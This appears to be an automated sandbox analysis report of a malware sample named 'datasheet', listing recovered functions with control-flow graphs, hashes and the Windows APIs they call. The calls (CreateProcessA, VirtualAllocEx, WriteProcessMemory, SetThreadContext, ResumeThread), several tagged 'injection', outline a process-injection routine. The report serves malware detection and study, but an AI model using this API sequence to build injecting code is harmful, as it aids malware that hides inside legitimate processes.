                                                            control_flow_graph 231 724cbb6-724cc4d 234 724cc86-724cca6 231->234 235 724cc4f-724cc59 231->235 240 724ccdf-724cd0e 234->240 241 724cca8-724ccb2 234->241 235->234 236 724cc5b-724cc5d 235->236 238 724cc80-724cc83 236->238 239 724cc5f-724cc69 236->239 238->234 242 724cc6d-724cc7c 239->242 243 724cc6b 239->243 251 724cd47-724ce01 CreateProcessA 240->251 252 724cd10-724cd1a 240->252 241->240 244 724ccb4-724ccb6 241->244 242->242 245 724cc7e 242->245 243->242 246 724ccb8-724ccc2 244->246 247 724ccd9-724ccdc 244->247 245->238 249 724ccc4 246->249 250 724ccc6-724ccd5 246->250 247->240 249->250 250->250 253 724ccd7 250->253 263 724ce03-724ce09 251->263 264 724ce0a-724ce90 251->264 252->251 254 724cd1c-724cd1e 252->254 253->247 256 724cd20-724cd2a 254->256 257 724cd41-724cd44 254->257 258 724cd2c 256->258 259 724cd2e-724cd3d 256->259 257->251 258->259 259->259 260 724cd3f 259->260 260->257 263->264 274 724cea0-724cea4 264->274 275 724ce92-724ce96 264->275 277 724ceb4-724ceb8 274->277 278 724cea6-724ceaa 274->278 275->274 276 724ce98 275->276 276->274 280 724cec8-724cecc 277->280 281 724ceba-724cebe 277->281 278->277 279 724ceac 278->279 279->277 283 724cede-724cee5 280->283 284 724cece-724ced4 280->284 281->280 282 724cec0 281->282 282->280 285 724cee7-724cef6 283->285 286 724cefc 283->286 284->283 285->286 288 724cefd 286->288 288->288
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724CDEE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 89b3996386b9feacb46755ef4c2d3750857e2b6249898437e825ecbe52c38338
                                                            • Instruction ID: 821455fc7e3bf9185123f67134d4dd6f17c969c89a3a86cfce770a7edb9df623
                                                            • Opcode Fuzzy Hash: 89b3996386b9feacb46755ef4c2d3750857e2b6249898437e825ecbe52c38338
                                                            • Instruction Fuzzy Hash: 08917DB1D1125ADFEF24CF68C8417EEBBB6BF48310F148569E809A7240DB749985CFA1
                                                            Function 0724CBB8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 289 724cbb8-724cc4d 291 724cc86-724cca6 289->291 292 724cc4f-724cc59 289->292 297 724ccdf-724cd0e 291->297 298 724cca8-724ccb2 291->298 292->291 293 724cc5b-724cc5d 292->293 295 724cc80-724cc83 293->295 296 724cc5f-724cc69 293->296 295->291 299 724cc6d-724cc7c 296->299 300 724cc6b 296->300 308 724cd47-724ce01 CreateProcessA 297->308 309 724cd10-724cd1a 297->309 298->297 301 724ccb4-724ccb6 298->301 299->299 302 724cc7e 299->302 300->299 303 724ccb8-724ccc2 301->303 304 724ccd9-724ccdc 301->304 302->295 306 724ccc4 303->306 307 724ccc6-724ccd5 303->307 304->297 306->307 307->307 310 724ccd7 307->310 320 724ce03-724ce09 308->320 321 724ce0a-724ce90 308->321 309->308 311 724cd1c-724cd1e 309->311 310->304 313 724cd20-724cd2a 311->313 314 724cd41-724cd44 311->314 315 724cd2c 313->315 316 724cd2e-724cd3d 313->316 314->308 315->316 316->316 317 724cd3f 316->317 317->314 320->321 331 724cea0-724cea4 321->331 332 724ce92-724ce96 321->332 334 724ceb4-724ceb8 331->334 335 724cea6-724ceaa 331->335 332->331 333 724ce98 332->333 333->331 337 724cec8-724cecc 334->337 338 724ceba-724cebe 334->338 335->334 336 724ceac 335->336 336->334 340 724cede-724cee5 337->340 341 724cece-724ced4 337->341 338->337 339 724cec0 338->339 339->337 342 724cee7-724cef6 340->342 343 724cefc 340->343 341->340 342->343 345 724cefd 343->345 345->345
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724CDEE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 6577e1cfaf0a01cdfd9a73ddafc144cff5173c8264c50e5ad2a53c254ef179a7
                                                            • Instruction ID: 90a89a7617c38f37d8f178e67a73d1ffe790796cd601928eb6ddb91c02c0cbfb
                                                            • Opcode Fuzzy Hash: 6577e1cfaf0a01cdfd9a73ddafc144cff5173c8264c50e5ad2a53c254ef179a7
                                                            • Instruction Fuzzy Hash: 78917DB1D1125ADFEF24CF68C8407EEBBB6BF48310F148569E809A7240DB749985CFA1
                                                            Function 02B3590D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 346 2b3590d-2b35916 347 2b35918-2b359d9 CreateActCtxA 346->347 349 2b359e2-2b35a3c 347->349 350 2b359db-2b359e1 347->350 357 2b35a4b-2b35a4f 349->357 358 2b35a3e-2b35a41 349->358 350->349 359 2b35a51-2b35a5d 357->359 360 2b35a60-2b35a90 357->360 358->357 359->360 364 2b35a42-2b35a44 360->364 365 2b35a92-2b35b14 360->365 364->357
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02B359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: aa1cec53c380faa59a33b49d4a8b417865ca01029bb28ede7ee3c1a72a321a79
                                                            • Instruction ID: d1d2748677abb27a9c1d964f4c3ffda0cc0d17fa3f2d3b11c9d092d5eb888b7f
                                                            • Opcode Fuzzy Hash: aa1cec53c380faa59a33b49d4a8b417865ca01029bb28ede7ee3c1a72a321a79
                                                            • Instruction Fuzzy Hash: 724104B0C0071DCBEB25CFA9C884B9EBBF5BF89304F60816AD508AB251DB756946CF50
                                                            Function 02B344C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 367 2b344c4-2b359d9 CreateActCtxA 370 2b359e2-2b35a3c 367->370 371 2b359db-2b359e1 367->371 378 2b35a4b-2b35a4f 370->378 379 2b35a3e-2b35a41 370->379 371->370 380 2b35a51-2b35a5d 378->380 381 2b35a60-2b35a90 378->381 379->378 380->381 385 2b35a42-2b35a44 381->385 386 2b35a92-2b35b14 381->386 385->378
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02B359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 4c8bfb9699e7c2656421e7befa07651f885c710b97016cf6f5ad296ce10302c9
                                                            • Instruction ID: e483feb3d54cab4db37be5169ebfb693acd86573b50f36656e854dd8aa92945b
                                                            • Opcode Fuzzy Hash: 4c8bfb9699e7c2656421e7befa07651f885c710b97016cf6f5ad296ce10302c9
                                                            • Instruction Fuzzy Hash: 5941E2B0C0071DCBEB25CFA9C98479EBBF5BF48304F6081AAD508AB251DB756945CF90
                                                            Function 0724C928 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 388 724c928-724c97e 391 724c980-724c98c 388->391 392 724c98e-724c9cd WriteProcessMemory 388->392 391->392 394 724c9d6-724ca06 392->394 395 724c9cf-724c9d5 392->395 395->394
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0724C9C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 5a4dbc78c480bd434d35c2f9b2fc998310dad25275f2aa335f64da6c493f9187
                                                            • Instruction ID: a396895bf8398f0c5f2228347fcf65c6412db5be92ee8d8718a10581de3d16c7
                                                            • Opcode Fuzzy Hash: 5a4dbc78c480bd434d35c2f9b2fc998310dad25275f2aa335f64da6c493f9187
                                                            • Instruction Fuzzy Hash: C6214BB690030A9FDF10CFA9C881BEEBBF5FF48320F10842AE559A7240D7799554CBA4
                                                            Function 0724C930 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 399 724c930-724c97e 401 724c980-724c98c 399->401 402 724c98e-724c9cd WriteProcessMemory 399->402 401->402 404 724c9d6-724ca06 402->404 405 724c9cf-724c9d5 402->405 405->404
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0724C9C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 7811aa5e3c89191ab2ad043dd2d50bb469ca6dc0050360f24efc5390e08090cc
                                                            • Instruction ID: 9d531ab03c507c8ff09f043fd2fc7d9c8dd7cd195776eea3a9a922c0407db380
                                                            • Opcode Fuzzy Hash: 7811aa5e3c89191ab2ad043dd2d50bb469ca6dc0050360f24efc5390e08090cc
                                                            • Instruction Fuzzy Hash: 492126B190134A9FDB14CFA9C881BEEBBF5FF48310F10842AE958A7240D7799950CBA4
                                                            Function 0724CA1A Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 409 724ca1a-724caad ReadProcessMemory 413 724cab6-724cae6 409->413 414 724caaf-724cab5 409->414 414->413
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724CAA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: ea16932332af7adfff43da595615772b86028fa8e454944700433f17288744fa
                                                            • Instruction ID: cc56b556875c0e4a145b0b635992c1d611c5a9258dcd040c00fa651be8d11386
                                                            • Opcode Fuzzy Hash: ea16932332af7adfff43da595615772b86028fa8e454944700433f17288744fa
                                                            • Instruction Fuzzy Hash: 902119B290135A9FDB14CFAAC841BEEBBF5FF48320F10842AE558A7240D7799550CBA5
                                                            Function 02B3D600 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 418 2b3d600-2b3d606 419 2b3d608-2b3d69c DuplicateHandle 418->419 420 2b3d6a5-2b3d6c2 419->420 421 2b3d69e-2b3d6a4 419->421 421->420
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3D68F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 70a6f2e7b31e416b2a2f1b636927524ad35d839d324f719addda2ea2750d07ea
                                                            • Instruction ID: ca0ad37a386217caf72dbf860456a606f383736715c5ae288f4fe9a5177d154d
                                                            • Opcode Fuzzy Hash: 70a6f2e7b31e416b2a2f1b636927524ad35d839d324f719addda2ea2750d07ea
                                                            • Instruction Fuzzy Hash: 6121E6B59002099FDB10CFAAD584ADEBBF4FB48320F14845AE918A7310D379A954CFA4
                                                            Function 0724C790 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 424 724c790-724c7e3 426 724c7e5-724c7f1 424->426 427 724c7f3-724c823 Wow64SetThreadContext 424->427 426->427 429 724c825-724c82b 427->429 430 724c82c-724c85c 427->430 429->430
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0724C816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: b68adf433c1c301422e1c64befee69de00c320e2e2bd68f7efa4ae1c35486a25
                                                            • Instruction ID: 51f645bced8c178698033843ed30fa02a73964f540130a011a9904dd6a93f508
                                                            • Opcode Fuzzy Hash: b68adf433c1c301422e1c64befee69de00c320e2e2bd68f7efa4ae1c35486a25
                                                            • Instruction Fuzzy Hash: 372159B190030A9FDB10CFAAC4857EEBBF4EF88320F14842AD519A7240D7799945CFA1
                                                            Function 0724C798 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 724c798-724c7e3 436 724c7e5-724c7f1 434->436 437 724c7f3-724c823 Wow64SetThreadContext 434->437 436->437 439 724c825-724c82b 437->439 440 724c82c-724c85c 437->440 439->440
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0724C816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 770cbe0a810469efad947c27f355ad4ea0fab1316ed12ea18bd1bc8d4b9d1701
                                                            • Instruction ID: da91ea617cff80f3c3c876919a9745217c819cf97971dfdc6d89798a09730a73
                                                            • Opcode Fuzzy Hash: 770cbe0a810469efad947c27f355ad4ea0fab1316ed12ea18bd1bc8d4b9d1701
                                                            • Instruction Fuzzy Hash: 6C2118B1D0030A9FDB14DFAAC4857AEBBF4EF88324F148429D519A7240DB789944CFA5
                                                            Function 0724CA20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724CAA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 0cffdcd028fa19a6a5c0aea4ff2b0043ace95663474a71ef12a3f1aad94b971f
                                                            • Instruction ID: 4257439c08ab7540b58ad8a42ce75ab1840fc0cd218dccdb61f6872503485edf
                                                            • Opcode Fuzzy Hash: 0cffdcd028fa19a6a5c0aea4ff2b0043ace95663474a71ef12a3f1aad94b971f
                                                            • Instruction Fuzzy Hash: DF2128B1D0135A9FDB10CFAAC881BEEBBF5FF88310F10842AE518A7240D7799550CBA5
                                                            Function 02B3D608 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3D68F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 9f3bd1cb7db45d156402089db28cbcae15c6bc1bfad34465c5d4983eed2eb83f
                                                            • Instruction ID: 9dc7749e041c5e5ed3777c31bb72646d416a06e0287e087afda058cae6b5bab9
                                                            • Opcode Fuzzy Hash: 9f3bd1cb7db45d156402089db28cbcae15c6bc1bfad34465c5d4983eed2eb83f
                                                            • Instruction Fuzzy Hash: AE21E4B59002099FDB10CFAAD984ADEBBF4FB48320F14845AE918A3310D379A954CFA4
                                                            Function 0724C868 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0724C8DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 5ec45d111b8f2a6a0dbd99918785ef1473a4a52c05d5a8c6f6c031ed78d4f0ee
                                                            • Instruction ID: a88a8e5b09250683ca7b42ef2ed57d2c37eba65912884d99880e0b9a0546f20f
                                                            • Opcode Fuzzy Hash: 5ec45d111b8f2a6a0dbd99918785ef1473a4a52c05d5a8c6f6c031ed78d4f0ee
                                                            • Instruction Fuzzy Hash: A3218C7290034A9FDF10CFAAC845BDFBFF5AF88320F14841AE519A7250CB769550CBA1
                                                            Function 0724BE71 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 4ce19604780d5740271c93aa9974b810a32c44f316d52f1d07e8802ac551eded
                                                            • Instruction ID: 58dd82566be194653e79485023019c2f37c1a7bdf4b53de31ea0f6daec79f89c
                                                            • Opcode Fuzzy Hash: 4ce19604780d5740271c93aa9974b810a32c44f316d52f1d07e8802ac551eded
                                                            • Instruction Fuzzy Hash: 701179B190034A9FDB24CFAAC4457DFFBF4AF88220F208419D219A7200CB79A500CB98
                                                            Function 0724C870 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0724C8DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 4da1d005b8abd7bcdf35db20a6dec6bb56989e6b00bf126169b1af54b056fe41
                                                            • Instruction ID: d91cd319dfacc945601023164f07204c7b3ed458888f872a31d7a34f1b1d0bcc
                                                            • Opcode Fuzzy Hash: 4da1d005b8abd7bcdf35db20a6dec6bb56989e6b00bf126169b1af54b056fe41
                                                            • Instruction Fuzzy Hash: E01126B290034A9FDB10DFAAC845BDFBBF5AF88320F148819E519A7250CB75A550CBA1
                                                            Function 0724BE78 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 9f18a5d60105c3e509753b14b360019551c8eb46be23606c1f6e6926ecaf05de
                                                            • Instruction ID: 6b2dae97969329a357b6ed74c5bcdbf14090c3f7f1bea8302fa79761e0aa2a23
                                                            • Opcode Fuzzy Hash: 9f18a5d60105c3e509753b14b360019551c8eb46be23606c1f6e6926ecaf05de
                                                            • Instruction Fuzzy Hash: DF1136B190034A8FDB24DFAAC44579FFBF5AF88724F248419D519A7240CB79A940CBA5
                                                            Function 07C01210 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C01275
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 15eb94a38d3a40930ba012a84c0c37408a40e0ff8e5ef2c3f759d62cf4fd4044
                                                            • Instruction ID: 4cb7541d421ecbd914170b68fa18e372f6aaa33ad0b03f09103169193192176a
                                                            • Opcode Fuzzy Hash: 15eb94a38d3a40930ba012a84c0c37408a40e0ff8e5ef2c3f759d62cf4fd4044
                                                            • Instruction Fuzzy Hash: F311E3B5800349DFDB10DF99D885BDFBBF8EB48724F20841AE518A7640C375A544CFA1
                                                            Function 02B3B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02B3B386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4665d62ad244b151979aa631648e0fb27e48395d1d41a03069dcb153642dc6ee
                                                            • Instruction ID: b6588a7c9e74780f6d1f5f3ad3ac85790433ac5ea572f09a560c76ecf009fc42
                                                            • Opcode Fuzzy Hash: 4665d62ad244b151979aa631648e0fb27e48395d1d41a03069dcb153642dc6ee
                                                            • Instruction Fuzzy Hash: C711DFB6C007598FDB10CF9AC544B9EFBF4EB88624F10845AD429B7610D379A545CFA1
                                                            Function 07C01218 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C01275
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: ecc1366556147667b5ee22828918f669e70f92d6a79e8796854469668a396bf9
                                                            • Instruction ID: 857e5a0eefb820b3607da6bf5ebd4fd3db93923f82d5e6cc142eaba876e13b4d
                                                            • Opcode Fuzzy Hash: ecc1366556147667b5ee22828918f669e70f92d6a79e8796854469668a396bf9
                                                            • Instruction Fuzzy Hash: 3611C2B5800349DFDB10CF9AC585BDEFBF8EB48324F148419D518A7650D375A554CFA1
                                                            Function 00EED01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46307277d55193fdc5aee1b4c8d277619a37732e1d3b1bc88a59a9eba6e61c8b
                                                            • Instruction ID: ad5770246b8d5fe6997f3404c33cd041ce471c6d7a0bbee8691cba2da1b85cff
                                                            • Opcode Fuzzy Hash: 46307277d55193fdc5aee1b4c8d277619a37732e1d3b1bc88a59a9eba6e61c8b
                                                            • Instruction Fuzzy Hash: 52213475608388EFCB14DF15D9C0B26BB66FB84318F28C56DD90A5B292C37BD807CA61
                                                            Function 00EED1D4 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df0de72dd896a339bc9db67fa1a12ddf23e3ea545a6cab933345cd7ac66eabcd
                                                            • Instruction ID: 7f0f0696f5721d79f952b972d761e69aa026a5773958e97e968265b927f54c55
                                                            • Opcode Fuzzy Hash: df0de72dd896a339bc9db67fa1a12ddf23e3ea545a6cab933345cd7ac66eabcd
                                                            • Instruction Fuzzy Hash: 25214675508388EFDB04DF51DDC0B26BBA5FB88318F20C56DEA095B2A2C376D806CA61
                                                            Function 00EED005 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ef2ac39ab9d4b7d18c1473f44a481cc51c577ef60e315a2cd23f38849ce3a06
                                                            • Instruction ID: fd508d0cf58dc9f7a5c920aa2be16709419768a23d7bc8f7d460c17e39b1d65d
                                                            • Opcode Fuzzy Hash: 7ef2ac39ab9d4b7d18c1473f44a481cc51c577ef60e315a2cd23f38849ce3a06
                                                            • Instruction Fuzzy Hash: 6821537550D3C48FDB12CF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                                                            Function 00EED1CF Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: b23d55dadc6ba77f63cb5238fd645ac8ee9f345a2d8c037e8eb9574f5cf256ee
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: 9D11DD79508284DFCB01CF50CAC0B15FBB1FB88318F24C6ADD9494B2A6C33AD81ACB61
                                                            Function 00EDD759 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184280984.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
